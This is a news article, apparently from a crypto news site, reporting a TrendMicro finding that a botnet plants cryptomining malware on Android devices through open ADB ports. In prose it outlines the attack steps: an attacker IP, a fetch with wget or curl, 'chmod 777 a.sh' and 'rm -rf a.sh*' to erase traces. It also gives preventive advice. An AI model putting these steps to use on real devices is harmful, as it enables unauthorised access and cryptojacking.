Hackers Planting Cryptocurrency Mining Malware on Android Smartphones
Hackers have found a way to exploit loopholes in open Android Debug Bridge (ADB) ports, a client-server program used in the development of Android applications, to mine blockchain-based digital assets. Once a device gets infected, the bad actors can spread the malware to connected devices via Secure Socket Shell (SSH), according to a TrendMicro report on June 20, 2019.
Cryptojackers on Rampage
According to the latest report by cybersecurity firm, TrendMicro, hackers are now orchestrating cryptojacking attacks on Android devices by seeding cryptocurrency mining botnet malware in the systems through open Android Debug Bridge (ADB) ports.
Per the researchers, the absence of any form of authentication mechanism on open ADB ports by default makes it easy for the rogue actors to plant the malicious malware and quickly spread it from the infected host to any system that previously connected with the host through SSH.
Specifically, the researchers have revealed that attacks involving the malware have been discovered in 21 different countries, including South Korea, which has the highest percentage.
Mode of Operation
Reportedly, the hackers connect their botnet to an ADB-running device via IP address, 45[.]67[.]14[.]179. It then goes ahead to change the system’s working directory to “/data/local/tmp,” using the ADB command shell, as .tmp files typically have permission to execute by default.
After that, the botnet tries to find out whether its host is a “honeypot” or not, using the “uname -a” command, before downloading the corresponding cryptocurrency mining malware payload using wget or curl, if the former is not available on the infected system.
To change the device’s permission settings to enable the downloaded payload to execute automatically, the bot issues the “chmod 777 a.sh” command.
Once the a.sh command has been successfully executed on the victim’s system, the bot uses the “rm -rf a.sh*” command to remove its traces.
That’s not all, to ensure its activities remains unnoticed by the host, the botnet malware deletes all downloaded files and payload files after it must have propagated itself in other devices connected to the infected system.
Preventive Measures
The researchers have advised users of Android devices to regularly check and change default settings to increase security, update the firmware on their devices and install the patches where necessary, while also trying their best to obtain information about new methods hackers employ to spread malicious malware and tailor defenses against them.
Alternatively, users of Android devices can download and install the latest version of Trend Micro Mobile Security for Android via Google Play.
As bitcoin (BTC) and altcoins keep increasing in value and use cases, cyberpunks are constantly formulating new methods of enriching themselves with ill-gotten crypto coins.
Earlier in June June 2019, BTCManager informed that cybersecurity researchers had discovered a new malware family called BlackSquid which exploits vulnerabilities in web servers, network drives, and removable drives to mine monero (XMR).